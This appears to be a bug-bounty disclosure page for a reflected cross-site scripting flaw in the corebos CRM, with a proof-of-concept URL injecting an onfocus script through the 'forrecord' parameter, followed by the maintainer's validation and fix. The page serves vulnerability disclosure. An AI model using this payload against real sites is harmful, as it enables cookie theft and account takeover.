We've joined Protect AIJoin us over there for bounties up to $50,000+ for vulnerabilities in AI/ML repos

/

Cross-site Scripting (XSS) - Reflected in tsolucio/corebos

Valid

Reported on

Oct 31st 2021

Description

Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites

Proof of Concept.

// PoC.js
Link --> http://demo.corebos.com/index.php?module=cbSurvey&action=cbSurveyAjax&file=index&ajax=true&search=true&gname=&query=true&search_field=cbsurveyname&searchtype=BasicSearch&operator=s&type=alpbt&search_text=L&form=&forfield=&srcmodule=&forrecord=xss%22%20autofocus/onfocus=%22alert(5)%22%20id=%27xxx

Vulnerable parameter --> forrecord

Impact

This vulnerability is capable of claiming other users cookie performing other advanced scenarios . Account takeover is possible in this case .

Joe Bordes validated this vulnerability 2 years ago

0x9x has been awarded the disclosure bounty

The fix bounty is now up for grabs

commented 2 years ago

Researcher

Thanks for your help too !

Joe Bordes marked this as fixed with commit dcd094 2 years ago

Joe Bordes has been awarded the fix bounty

This vulnerability will not receive a CVE

to join this conversation

Joe Bordes validated this vulnerability 2 years ago

0x9x has been awarded the disclosure bounty

The fix bounty is now up for grabs

commented 2 years ago

Researcher

Thanks for your help too !

Joe Bordes marked this as fixed with commit dcd094 2 years ago

Joe Bordes has been awarded the fix bounty

This vulnerability will not receive a CVE

to join this conversation